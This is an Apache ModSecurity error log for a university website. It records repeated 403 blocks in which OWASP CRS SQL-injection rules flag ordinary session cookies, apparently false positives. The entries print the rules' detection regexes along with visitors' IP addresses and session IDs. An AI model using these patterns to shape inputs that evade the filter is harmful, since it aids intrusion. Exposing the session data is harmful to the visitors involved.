[Mon Aug 28 23:57:38.428487 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOzSAsCo-f0AANny2WQAAAAO"]
[Mon Aug 28 23:57:38.430308 2023] [:error] [pid 55916] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOzSAsCo-f0AANpsPIUAAAAf"]
[Mon Aug 28 23:57:38.447160 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOzSAsCo-f0AANpfcYoAAAAF"]
[Mon Aug 28 23:57:38.455690 2023] [:error] [pid 55912] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOzSAsCo-f0AANpo-8EAAAAb"]
[Mon Aug 28 23:57:38.654680 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOzSAsCo-f0AANpm5qkAAAAX"]
[Mon Aug 28 23:57:38.662744 2023] [:error] [pid 55749] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOzSAsCo-f0AANnF9bMAAAAE"]
[Mon Aug 28 23:57:38.681324 2023] [:error] [pid 55794] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOzSAsCo-f0AANny2WUAAAAO"]
[Mon Aug 28 23:57:38.684508 2023] [:error] [pid 55916] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOzSAsCo-f0AANpsPIYAAAAf"]
[Mon Aug 28 23:57:38.708756 2023] [:error] [pid 55903] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOzSAsCo-f0AANpfcYsAAAAF"]
[Mon Aug 28 23:57:38.718379 2023] [:error] [pid 55912] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOzSAsCo-f0AANpo-8IAAAAb"]
[Mon Aug 28 23:57:38.902521 2023] [:error] [pid 55910] [client 3.237.10.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x228f909e52ea780bdb95b8623991796799\\x22;s:10:\\x22ip_address\\x22;s:11:\\x223.237.10.85\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241857\\x22;}1b65a2cf2ea93373b44e07ada8716db7"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOzSAsCo-f0AANpm5qoAAAAX"]
[Mon Aug 28 23:57:39.159175 2023] [:error] [pid 55914] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzSA8Co-f0AANpqFygAAAAd"]
[Mon Aug 28 23:57:39.554324 2023] [:error] [pid 55914] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzSA8Co-f0AANpqFykAAAAd"]
[Mon Aug 28 23:57:44.406655 2023] [:error] [pid 55914] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzSCMCo-f0AANpqFyoAAAAd"]
[Mon Aug 28 23:57:44.545710 2023] [:error] [pid 55914] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ; found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzSCMCo-f0AANpqFysAAAAd"]
[Mon Aug 28 23:57:57.683550 2023] [:error] [pid 55957] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\*.+(?:x?or|div|like|between|and|id)\\\\W*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\d)|(?:\\\\^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:^[\\\\w\\\\s\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98-]+(?<=and\\\\s)(?<=or|xor ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "245"] [id "981243"] [msg "Detects classic SQL injection probings 2/2"] [data "Matched Data: \\x22140.21 found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOzSFcCo-f0AANqV5h4AAAAN"]
[Mon Aug 28 23:57:57.851886 2023] [:error] [pid 55957] [client 140.213.43.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\*.+(?:x?or|div|like|between|and|id)\\\\W*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\d)|(?:\\\\^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:^[\\\\w\\\\s\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98-]+(?<=and\\\\s)(?<=or|xor ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "245"] [id "981243"] [msg "Detects classic SQL injection probings 2/2"] [data "Matched Data: \\x22140.21 found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x225f2d6daff9fffae752b8f1ad6f33427e\\x22;s:10:\\x22ip_address\\x22;s:13:\\x22140.213.43.86\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Linux; Android 10; RMX1821) AppleWebK\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241847\\x22;}eac9832f2b8c5ca2c034cb3667207fb6"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOzSFcCo-f0AANqV5h8AAAAN"]
[Mon Aug 28 23:57:58.421517 2023] [:error] [pid 55956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\*.+(?:x?or|div|like|between|and|id)\\\\W*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\d)|(?:\\\\^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:^[\\\\w\\\\s\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98-]+(?<=and\\\\s)(?<=or|xor ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "245"] [id "981243"] [msg "Detects classic SQL injection probings 2/2"] [data "Matched Data: \\x22203.17 found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22d27e650aaefb4b1f8d561ff138450841\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241624\\x22;}32ddf272f44aead720f0d6d1f8b1ec86"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOzSFsCo-f0AANqUMPUAAAAA"]
[Mon Aug 28 23:57:59.719323 2023] [:error] [pid 55956] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\*.+(?:x?or|div|like|between|and|id)\\\\W*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\d)|(?:\\\\^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:^[\\\\w\\\\s\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98-]+(?<=and\\\\s)(?<=or|xor ..." at REQUEST_COOKIES:ci_session. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "245"] [id "981243"] [msg "Detects classic SQL injection probings 2/2"] [data "Matched Data: \\x22203.17 found within REQUEST_COOKIES:ci_session: a:4:{s:10:\\x22session_id\\x22;s:32:\\x22d27e650aaefb4b1f8d561ff138450841\\x22;s:10:\\x22ip_address\\x22;s:15:\\x22203.176.176.235\\x22;s:10:\\x22user_agent\\x22;s:50:\\x22Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWeb\\x22;s:13:\\x22last_activity\\x22;s:10:\\x221693241624\\x22;}32ddf272f44aead720f0d6d1f8b1ec86"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOzSF8Co-f0AANqUMPYAAAAA"]
